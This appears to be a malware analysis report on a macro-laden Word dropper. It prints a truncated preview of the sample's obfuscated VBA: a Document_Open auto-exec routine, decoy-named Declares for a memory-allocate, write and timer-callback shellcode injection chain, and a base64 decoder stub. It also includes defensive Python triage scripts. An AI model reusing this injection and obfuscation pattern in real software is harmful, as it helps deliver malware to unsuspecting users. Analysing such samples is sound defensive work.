Malware Insights
ClamAV identifies the sample with the signature Doc.Dropper.Agent-6366780-0, i.e. a document whose job is to stage and run a further payload. The VBA project contains a Document_Open procedure, so the macro runs as soon as the document is opened in Word with macros enabled; no interaction beyond opening the file is needed. The VBA source is heavily obfuscated (throw-away variables with dictionary-word names, arithmetic that folds to constants, and two conditionally compiled sets of Declare statements selected through the Win64 constant) and the preview is truncated, but the Win32 APIs declared under decoy names are telling. NtAllocateVirtualMemory, NtWriteVirtualMemory and CreateTimerQueueTimer are the allocate-write-execute sequence used to run shellcode inside the Word process itself, with a timer-queue callback standing in for CreateThread as the trigger. GetOverlappedResult and SleepConditionVariableSRW are declared against Shlwapi.dll, which does not export either of them (both are kernel32 exports), and several library names carry a trailing space; both are hallmarks of decoy declarations meant to pad the import list, and VBA resolves Declares lazily, so a decoy that is never called costs nothing. The payload written into the allocated memory is not visible in the truncated preview. Nothing in the extracted macro text shows a download URL (the URLs listed below are XML namespace identifiers from embedded image metadata, not network indicators), and the parlor() function builds a base64-style decode table, which is consistent with a payload carried inside the macro and decoded at run time rather than fetched.
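One way to check the reading above mechanically, as an added example (not the analyzer's code and not part of the sample): parse the Declare statements out of extracted VBA, recover the real API name from the Alias, and flag the three things that make this sample's declarations suspicious: an auto-exec entry point, the allocate/write/execute trio, and library names that are padded with whitespace or do not export the named function. The VBA fragment is constructed for the example and modelled on the preview; the API lists are the editor's own assumptions about which exports matter, not something the report provides.

```python
"""Triage of Win32 API Declare statements in extracted VBA.

Added example: not the analyzer's code and not part of the sample. The VBA
below is a constructed fragment modelled on the preview (decoy VBA names,
real API names in Alias, padded library names); the API lists are the
editor's own and are assumptions about which exports matter, not anything
the report provides.
"""
import re

SAMPLE_VBA = r'''
Private Sub Document_Open()
    Pmt 0, calceus, 32028, 28545, 7
End Sub
#If Win64 Then
Public Declare PtrSafe Function artichoke _
    Lib "ntdll " Alias _
    "NtWriteVirtualMemory" (ByVal a As Any, ByVal b As Any) As LongPtr
Public Declare PtrSafe Function potty Lib "ntdll " Alias "NtAllocateVirtualMemory" (a As LongPtr) As LongPtr
Public Declare PtrSafe Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (a As Any) As Long
Public Declare PtrSafe Function associate Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal a As Any) As LongPtr
#End If
'''

# Procedures Word/Excel run without any further user action.
AUTO_EXEC = ("document_open", "autoopen", "auto_open", "workbook_open",
             "document_close", "autoclose", "autoexec")

# Injection primitives grouped by the stage they provide (assumed list).
INJECTION_APIS = {
    "NtAllocateVirtualMemory": "allocate", "VirtualAlloc": "allocate",
    "VirtualAllocEx": "allocate",
    "NtWriteVirtualMemory": "write", "WriteProcessMemory": "write",
    "RtlMoveMemory": "write",
    "CreateTimerQueueTimer": "execute", "CreateThread": "execute",
    "CreateRemoteThread": "execute", "QueueUserAPC": "execute",
    "EnumSystemLocalesA": "execute",
}

# DLL that actually exports the function (assumed, from public API docs).
EXPORT_HOME = {
    "GetOverlappedResult": "kernel32", "SleepConditionVariableSRW": "kernel32",
    "CreateTimerQueueTimer": "kernel32", "VirtualAlloc": "kernel32",
    "NtWriteVirtualMemory": "ntdll", "NtAllocateVirtualMemory": "ntdll",
}

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<name>\w+)\s+'
    r'Lib\s+"(?P<lib>[^"]*)"\s*(?:Alias\s+"(?P<alias>[^"]*)")?',
    re.IGNORECASE)


def join_continuations(src):
    """Fold VBA line continuations (a trailing ` _`) so each Declare is one line."""
    return re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)


def normalize_lib(lib):
    """'Shlwapi.dll ' -> 'shlwapi': drop padding, case and the .dll suffix."""
    lib = lib.strip().lower()
    return lib[:-4] if lib.endswith(".dll") else lib


def parse_declares(src):
    """Return one record per Declare: decoy name, raw Lib string, real API."""
    decls = []
    for m in DECLARE_RE.finditer(join_continuations(src)):
        decls.append({
            "vba_name": m.group("name"),
            "lib_raw": m.group("lib"),
            "lib": normalize_lib(m.group("lib")),
            "api": m.group("alias") or m.group("name"),
        })
    return decls


def triage(src):
    """Flag auto-exec entry points, injection APIs and decoy-looking Declares."""
    findings = []
    lowered = src.lower()
    for ep in AUTO_EXEC:
        if re.search(r'\bsub\s+' + ep + r'\b', lowered):
            findings.append(("auto_exec", ep))
    stages = set()
    for d in parse_declares(src):
        api = d["api"]
        if api in INJECTION_APIS:
            stages.add(INJECTION_APIS[api])
            findings.append(("injection_api", api))
        if d["lib_raw"] != d["lib_raw"].strip():
            # Padding such as "ntdll " defeats naive string matching on Lib.
            findings.append(("lib_padding", api))
        home = EXPORT_HOME.get(api)
        if home and d["lib"] != home:
            # VBA resolves Declares lazily, so a decoy that is never called
            # costs nothing; flag it rather than trusting the declared library.
            findings.append(("lib_mismatch",
                             f"{api} declared in {d['lib']}, exported by {home}"))
        if d["vba_name"].lower() != api.lower():
            findings.append(("alias_hides_api", f"{d['vba_name']} -> {api}"))
    return {
        "findings": findings,
        "stages": sorted(stages),
        "injection_chain": {"allocate", "write", "execute"} <= stages,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    for kind, detail in report["findings"]:
        print(f"{kind:16} {detail}")
    print("allocate/write/execute chain present:", report["injection_chain"])
```

Run it against the macros.bas that olevba extracts rather than the constructed fragment; the continuation-folding step matters, because the sample splits several Declare statements across lines with `_`, which a line-oriented grep would miss.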
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6366780-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6366780-0
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

  All eight are XML namespace identifiers (Adobe XMP and Photoshop metadata, RDF, Dublin Core, OOXML DrawingML) that arrive with an embedded image and its drawing markup. None of them was reached from the macro, and none should be treated as a network indicator or a download source.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32447 bytes | 8ab86482a4baad14c568468e228257fc0a7a05d33751d6275721c80e1e30f503 |
Preview script: first 1,000 lines of the extracted script (the preview is cut off mid-statement; the cut is kept as-is below)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Auto-exec entry point: runs when the document is opened.
Private Sub Document_Open()
    Dim blowing As Long
    Dim bloodless As Integer
    pedunculate = "cantilenam"
    muhlenbergia = "antifreeze"
    foxiss.incredulity
    calceus = 50 + 9
    frangible = 18180 + 1
    whydah = 124440 + 4
    Pmt 0, calceus, 32028, 28545, 7
End Sub

' Second module of the VBA project.
Attribute VB_Name = "aforte"

' 32-bit Declares. Real API names are in the Alias; the VBA names are decoys.
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Public Declare Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (returning As Any, ByVal caliche As Any, ByVal mitt As Any, ByVal amentiferae As Any, ByVal anthologist As Any, ByVal untruly As Any, ByVal sclerite As Any) As Long
Public Declare Function cashable Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal theolgian As Any, epicene As Any, predicative As Any, seaweed As Any) As Long
Public Declare Function lythraceae Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal scandent As Any, chequer As Any, flight As Any, be As Any) As Long
Public Declare Function artichoke _
    Lib "Ntdll " Alias "NtWriteVirtualMemory" (ByVal dreamy As Any, ByVal skeleton As Any, ByVal invidious As Any, ByVal blacktop As Any, ByVal inconceivably As Any) As Long
Public Declare Function potty _
    Lib "Ntdll " Alias "NtAllocateVirtualMemory" (plantar As Long, epulation As Long, ByVal appropriable As Long, musguByVal As Long, liberian As Long, ByVal gymslip As Long) As Long
#End If

' 64-bit (PtrSafe) Declares for the same set of APIs.
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare PtrSafe Function artichoke _
    Lib "ntdll " Alias _
    "NtWriteVirtualMemory" (ByVal larmes As Any, ByVal digladiation As Any, ByVal ambassadress As Any, ByVal cochelous As Any, ByVal bocage As Any) As LongPtr
Public Declare PtrSafe Function beginner Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal bronchitic As Any, admissable As Any, peppermint As Any, creeper As Any) As LongPtr
Public Declare PtrSafe Function potty _
    Lib "ntdll " Alias _
    "NtAllocateVirtualMemory" (asymmetry As LongPtr, foamy As LongPtr, ByVal amianthus As LongPtr, barbouillageByVal As LongPtr, backswimmer As LongPtr, ByVal drogue As LongPtr) As LongPtr
Public Declare PtrSafe Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (turpentine As Any, ByVal immunosuppressant As Any, ByVal mugginess As Any, ByVal fateful As Any, ByVal apochromatic As Any, ByVal lizard As Any, ByVal welldefined As Any) As Long
Public Declare PtrSafe Function associate Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal dropping As Any, declivitous As Any, microstrobos As Any, medulla As Any) As LongPtr
#End If

' Operator dispatcher: alca selects integer division (41), And (51) or multiply (59).
Function orchard(kiev, erotically, alca)
    If alca = (41 + (10 / 2 - 5)) * 1 Then
        orchard = kiev \ erotically
    ElseIf alca = (51 + (5 - 3) / 2 - 1) * 1 Then
        orchard = kiev And erotically
    ElseIf alca = (59 + (56 / 7 - 4 * 2)) * 1 Then
        orchard = kiev * erotically
    End If
End Function

' Builds a 256-entry lookup table indexed by ASCII code: 'A'..'Z' -> 0..25,
' 'a'..'z' -> 26..51, '0'..'9' -> 52..61, '+' -> 62, '/' -> 63, i.e. the
' reverse table of the standard base64 alphabet. The loop starts and bounds
' are written as arithmetic (114 - 38 - 11 = 65, 40 + 8 = 48, 90 + 7 = 97).
Function parlor()
    Dim ghastly(255) As Byte
    dracunculus = 114 - 38 - 11
    Do While 1 * (dracunculus) <= (90 + 1) * 1
        ghastly(dracunculus) = dracunculus - 65
        dracunculus = dracunculus + 1
    Loop
    dracunculus = 40 + 8
    Do While 1 * (dracunculus) <= (50 + 8) * 1
        ghastly(dracunculus) = dracunculus + 4
        dracunculus = dracunculus + 1
    Loop
    dracunculus = 90 + 7
    Do While 1 * (dracunculus) <= (120 + 3) * 1
        ghastly(dracunculus) = dracunculus - 71
        dracunculus = dracunculus + 1
    Loop
    ghastly(47) = 60 + 3
    dracunculus = 40 + 3
    ghastly(dracunculus) = 60 + 2
    parlor = ghastly
End Function

' Decoder stub; StrConv(x, 128) is vbFromUnicode, turning the input string
' into an ANSI byte array. The preview is truncated in the declarations.
Function banished(bloodmobile) As String
    Dim assiduity() As Byte
    Dim haplosporidian(63) As Long
    Dim grto(63) As Long
    Dim flindersia(63) As Long
    Dim cornhusk As Long
    Dim alms As Long
    Dim student As Long
    Dim decoration() As Byte
    Dim clitoral As Long
    cither = cither And 297
    assiduity = VBA.StrConv(bloodmobile, 128)
    Dim exacum(6962) As By ... (truncated)
```
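The table that parlor() fills is the most informative part of the preview, because its shape identifies the encoding of whatever banished() decodes. Ported to Python as an added example (not the report's code and not the sample's): the loops keep the macro's arithmetic so the folded constants stay visible, and the check compares the result with the standard base64 alphabet. The decoder at the end is an assumption about what banished() does with the table, since the preview stops before its body; what the page does show is that banished() starts with VBA.StrConv(s, 128), i.e. vbFromUnicode, which turns the input string into an ANSI byte array, and that it declares a Byte array for its output.

```python
"""Port of parlor() from the macro preview, plus an assumed decoder.

Added example; not code from the report or from the sample. The loop
bounds keep the macro's arithmetic (114 - 38 - 11 is 65, and so on) so
the constant folding is visible. decode_with_table() is an assumption
about what banished() does with the table: the preview ends before its
body, so only the StrConv(..., 128) prologue is known.
"""
import base64
import string


def parlor_table():
    """256-entry table indexed by ASCII code, filled exactly as parlor() does."""
    t = [0] * 256
    i = 114 - 38 - 11                 # 65, 'A'
    while i <= (90 + 1) * 1:          # 'A'..'Z' -> 0..25 ('[' -> 26 is overspill)
        t[i] = i - 65
        i += 1
    i = 40 + 8                        # 48, '0'
    while i <= (50 + 8) * 1:          # '0'..'9' -> 52..61 (':' -> 62 is overspill)
        t[i] = i + 4
        i += 1
    i = 90 + 7                        # 97, 'a'
    while i <= (120 + 3) * 1:         # 'a'..'z' -> 26..51 ('{' -> 52 is overspill)
        t[i] = i - 71
        i += 1
    t[47] = 60 + 3                    # '/' -> 63
    i = 40 + 3
    t[i] = 60 + 2                     # '+' -> 62
    return t


def standard_base64_table():
    """Reverse table of the RFC 4648 alphabet, for comparison."""
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
    return {ord(c): v for v, c in enumerate(alphabet)}


def table_is_base64(t):
    """True when t maps every standard base64 character to its 6-bit value."""
    return all(t[code] == val for code, val in standard_base64_table().items())


def decode_with_table(text, t=None):
    """Assumed reimplementation of banished(): base64-decode using the table.

    bytes(text, 'latin-1') plays the role of VBA.StrConv(s, 128)
    (vbFromUnicode): the input string becomes a byte array that indexes t.
    """
    t = parlor_table() if t is None else t
    acc, nbits, out = 0, 0, bytearray()
    for b in bytes(text, "latin-1"):
        if b == ord("="):             # padding: stop, like a normal decoder
            break
        acc = ((acc << 6) | t[b]) & 0xFFFF
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
    return bytes(out)


if __name__ == "__main__":
    print("parlor() table equals the base64 alphabet:", table_is_base64(parlor_table()))
    sample = base64.b64encode(b"constructed sample").decode()   # constructed input
    print(decode_with_table(sample))
```

The three overspill entries ('[', ':' and '{') come from the macro's `<=` bounds being one past the last alphabet character; they never occur in valid base64 input, so the table is functionally the standard one. Once the remainder of banished() is recovered from the full macros.bas, the same table can be used to decode whatever string literal the macro feeds it before the NtWriteVirtualMemory call.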